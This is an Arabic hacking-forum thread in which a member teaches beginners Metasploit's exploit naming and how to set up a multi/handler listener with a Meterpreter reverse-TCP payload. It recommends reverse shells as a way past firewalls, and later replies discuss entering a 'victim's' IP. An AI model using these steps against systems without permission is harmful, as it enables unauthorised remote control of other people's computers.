التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] > MetaSploit

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 09-22-2009, 11:25 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
المجهووول
Mr.AlmjH00l SnaK3sPc T34M
 
الصورة الرمزية المجهووول
 

 

 
إحصائية العضو





المجهووول غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
المجهووول is on a distinguished road

افتراضي [الدرس الخامس] الاكسبلويت واستخداماتها وانواعها


بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاتة

اول شيء :كل عام وانتم الى الله اقرب
ثاني شيء
كيف احوالكم وصحتكم وان شاء الله تكونو بخير وتصوموا ستة شوال مو مثلي :D
ثالث شيء اليوم درسنا عن الاسكبلويت exploits وما هي انواعها ووظيفتها
ووظيفتها يكمن في اسمها ونوعها

يعني درس بسيط ومفهوم بأذن الله

لأستعراض الـ exploit نضع الامر

كود PHP:
show exploits 
الآن رح يظهر امامنا الثغرات

ملاحظة للثغرات والبايلود واقسامها
تكون كذا

windows/browser/yahoomessenger_fvcom

windows/ browser/ yahoomessenger_fvcom
اسم الثغرة | النوع او البرنامج المصاب | نوع النظام المصاب بالثغرة

هذه بأختصار
الآ نجي نشملها شوي
windows : كما ذكرت سابقا وهي ترمز لنوع النظام المصاب ولا يقتصر فقط على وندز وانما يشمل الجميع منل لينوكس ويونكس .. وقليل جدا ما تلاقي لينوكس ويونكس لقلة الثغرات الموجودة به لانه يستعمل امتداد tar.giz اذافة الى انها لا تحتاج اي كراك ولا غيرها ولا برامج تنفيذية .ز يعني لا يشغلها
browser : نوع البرنامج المصاب وهنا في هذه الحالة المتصفح Internet Explorer وانتم تعرفونه وتعرفون ثغرات .. بس بالميتاسبلويت جاهزة وكمان ثغرات ذات امتداد صورة :D افرح يا ولد :057:

yahoomessenger_fvcom : اسم الثغرة في مجلد الميتاسبلويت ويلزم ان يكون اسم الثغرة حسب ما هو مطلوب ضمن اكواد الثغرة

هيك هي تقسم الثغرة الى ثلاث اقسام وهي نوع النظام ونوع البرنامج المصاب واسم الثغرة

الآن لتعرف ماذا تعمل هذه الثغرة او ما البرنامج المصاب واصداره .. يكون موجود في الجانب الايمن شرح موجز بسيط عنه او بأمكانك وضع كلمة Info متبوعة بألثغرة يعني في مثالنا الاعلى يعني يكون الامر كذا
info windows/browser/yahoomessenger_fvcom

الآن يوجد ثغرات شاذة
مثل :...!!

كود PHP:
test/aggressivetest 
كود PHP:
test/exploitme 
كود PHP:
test/kernel 
فهي واضحة
تعمل اختيار سواء لسيرفر او نواة كيرنل

ويوجد هذه ايضا

كود PHP:
multi/handler 
الاغلب يظن ثغرة وهذه يا اخوان هي شبيه جدا بالنت كات .. تعمل تصنت .. لكن فقط تستعمل للميتاسبلويت لانه في اعداداتها يلزمك تضع البايلود والاي بي والبورت ... ما يهمنا الاي بي والبورت لكن اذ لم تضع البايلود فلت يتم الاستغلال يعني لا تستخدم في تصنت على سيرفرات وسيف مود .. ألخ

وهنا سأشرح استخدامها
اول شيء تستخدم امر استخدام الثغرو
كود PHP:
use multi/handler 
ثاني شيء امر ادخال اي بي جهازك للتصنت
كود PHP:
set LHOST 192.168.4.101 
ثالث امر ادخال البورت الذي وضعته في خيارات الثغرة او البايلود <<< رح تفهمها قريباا
كود PHP:
set LPORT 9999 
وبأمكانك وضع اي بورت استخدمته انت في اختيارتك للثغرة

رابع امر وهو اختيار البايلود التي وضعتها في استغلالك لثغرة ما او وضعتها عند انشائك لبايلود .. فتضعها هناا

كود PHP:
set PAYLOAD windows/meterpreter/reverse_tcp 
ويفضل للجميع اختيار الاتصال العكسي لتخطي الجدار الناري اذا لم يكن مفتوح بورت .. وهذا بعد التأكد من ان البورت مفتوح

####
اعرف طولتها عليكم
والاغلب مافهم منيح
لكن بعد الدروس القادمة رح تكونون فاهمين كل شيء ... !

$##$#$#$#$#$$$#$#$
تحياتي
لا للاحتكار
المجهوول


Fhg]vs hgohlsD hgh;sfg,dj ,hsjo]hlhjih ,hk,huih


التعديل الأخير تم بواسطة المجهووول ; 11-13-2009 الساعة 04:39 PM.

   

رد مع اقتباس
قديم 09-22-2009, 07:21 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية data$hack
 

 

 
إحصائية العضو







data$hack غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
data$hack is on a distinguished road

افتراضي


بارك الله فيك

التوقيع


data$hack : EIP HUNTER


Ninja-security team
http://Pentest101.blogspot.com

 

   

رد مع اقتباس
قديم 09-22-2009, 10:23 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي


مبدع ما شاء الله

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 09-23-2009, 12:34 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
المجهووول
Mr.AlmjH00l SnaK3sPc T34M
 
الصورة الرمزية المجهووول
 

 

 
إحصائية العضو





المجهووول غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
المجهووول is on a distinguished road

افتراضي


الله يخليكم

   

رد مع اقتباس
قديم 09-23-2009, 03:53 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
إحصائية العضو







ابو بدر غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
ابو بدر is on a distinguished road

افتراضي


الله لا يحرمنا منك
واصل ابداعك
سلام

   

رد مع اقتباس
قديم 11-13-2009, 03:09 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
إحصائية العضو






ThE BiGeSt JoKeR غير متواجد حالياً

إرسال رسالة عبر Skype إلى ThE BiGeSt JoKeR

 

 

إحصائية الترشيح

عدد النقاط : 10
ThE BiGeSt JoKeR is on a distinguished road

افتراضي


بطل و الله بطل

شرح راائع جدا و مفيد

لكن

اقتباس
ثاني شيء امر ادخال اي بي جهازك للتصنت


كود PHP:
set RHOST 192.168.4.101 

عارف طولت عليك بالاسئله و مالي داعي
خخخخخخ


معليش بس تحملني ><
"""
بس هو الواحد اذا سوى امر set RHOST XXXXXX

RHOST = اي بي الضحيه اذا ما خاب ظني

يعني قصدك ادخل اي بي الضحيه و ليس اي بي جهاز ... صح ^^

خخخخخخخخخخخ

عندي شيء صغير ايضاً

في الاتصال العكسي
هو انا ادخل اي بي الشبكه اللي انا شابك عليها
و لا ادخل www.ip-adress.com و احط الـ اي بي تبعي

و كذا هو الحال مع الضحيه؟

مشكوور يا حوبي على الدرس الراائع ^^

هذا يا حبيبي و السلام ^^
التوقيع

انتبه ...
جيوش الـ Metasploit ستزور العناكب



نحن قوم لا نحب الغرور .. لكن الزمن سمح لنا بالتباهي .. لأننا ملوك


[/COLOR]

on vbspiders only

 


التعديل الأخير تم بواسطة ThE BiGeSt JoKeR ; 11-13-2009 الساعة 03:25 PM.

   

رد مع اقتباس
قديم 11-13-2009, 04:38 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
المجهووول
Mr.AlmjH00l SnaK3sPc T34M
 
الصورة الرمزية المجهووول
 

 

 
إحصائية العضو





المجهووول غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
المجهووول is on a distinguished road

افتراضي


اها سوري اخطأت مطبعي
اي بي جهاز لكن هي LHOST
في حالة اختراقك للشبكة تضع اي بي الشبكة بتاع جهازك اما اذا في حال اختراق شخص خارج الشبكة بتضع الاي بي بتاع الجهاز ip-adress.com
ومشكور اخوي ع المتابعة
##
تحياتي
لا للاحتكار
المجهوول

   

رد مع اقتباس
قديم 11-13-2009, 04:50 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
إحصائية العضو






ThE BiGeSt JoKeR غير متواجد حالياً

إرسال رسالة عبر Skype إلى ThE BiGeSt JoKeR

 

 

إحصائية الترشيح

عدد النقاط : 10
ThE BiGeSt JoKeR is on a distinguished road

افتراضي


يسلمووووووو يا حبي على التوضيح ^^

التوقيع

انتبه ...
جيوش الـ Metasploit ستزور العناكب



نحن قوم لا نحب الغرور .. لكن الزمن سمح لنا بالتباهي .. لأننا ملوك


[/COLOR]

on vbspiders only

 

   

رد مع اقتباس
قديم 11-16-2009, 10:17 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
المجهووول
Mr.AlmjH00l SnaK3sPc T34M
 
الصورة الرمزية المجهووول
 

 

 
إحصائية العضو





المجهووول غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
المجهووول is on a distinguished road

افتراضي


سلمت يا غالي

   

رد مع اقتباس
قديم 02-07-2010, 06:43 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية v.i.r.u.s
 

 

 
إحصائية العضو





v.i.r.u.s غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
v.i.r.u.s is on a distinguished road

افتراضي


بارك الله فيك اخى وجزاك خيرا على المجهود
سبحان الله وبحمدة سبحان الله العظيم

   

رد مع اقتباس
قديم 02-14-2010, 03:49 PM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية Mr.$LeV!n
 

 

 
إحصائية العضو





Mr.$LeV!n غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Mr.$LeV!n is on a distinguished road

افتراضي


مشكووور على الشرح

   

رد مع اقتباس
قديم 02-21-2010, 10:31 PM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية blablabou94
 

 

 
إحصائية العضو







blablabou94 غير متواجد حالياً

إرسال رسالة عبر MSN إلى blablabou94

 

 

إحصائية الترشيح

عدد النقاط : 10
blablabou94 is on a distinguished road

افتراضي


شكرا لك يا حبيبي العزيز والله أنت عندك دروس موش نورمال

   

رد مع اقتباس
قديم 03-25-2010, 09:22 PM   رقم المشاركة : 13 (permalink)
معلومات العضو
D-GhosT s3cur!Ty-Z
::. Moderators .::
 
الصورة الرمزية D-GhosT s3cur!Ty-Z
 

 

 
إحصائية العضو







D-GhosT s3cur!Ty-Z غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
D-GhosT s3cur!Ty-Z is on a distinguished road

افتراضي


شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية . شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

التوقيع

Palastine 4ever



يرجى من الاخوة الكرام الاطلاع على قوانين الشبكة
لكي تكون لك مشاركة رائعة مع الشبكة


http://www.vbspiders.com/vb/t71973.html

 

   

رد مع اقتباس
قديم 09-26-2010, 01:15 PM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
إحصائية العضو







Abood Noiseless غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Abood Noiseless is on a distinguished road

افتراضي


مشششششششششششششكككككككككككككورا - يعطيك العافية -

   

رد مع اقتباس
قديم 11-26-2010, 07:56 PM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
الصورة الرمزية ouTLaw
 

 

 
إحصائية العضو






ouTLaw غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ouTLaw is on a distinguished road

افتراضي


بارك الله فيك اخى وجزاك خيرا

التوقيع

[align=center]وَتِلْكَ حُدُودُ اللَّهِ وَمَنْ يَتَعَدَّ حُدُودَ اللَّهِ فَقَدْ ظَلَمَ نَفْسَهُ [/align]

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
الدرس الخامس (الاوامر الشرطية) SoLiTair4Ever برمجة الويب 1 09-29-2013 11:22 PM
لدي مشكلة في الدرس الخامس kais bettaieb جـــ'ابات العناكــ'ب 8 07-10-2010 03:09 PM
استفسار متاخر :$ عن الدرس الخامس barca-x جـــ'ابات العناكــ'ب 3 04-23-2010 11:17 PM


الساعة الآن 04:58 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0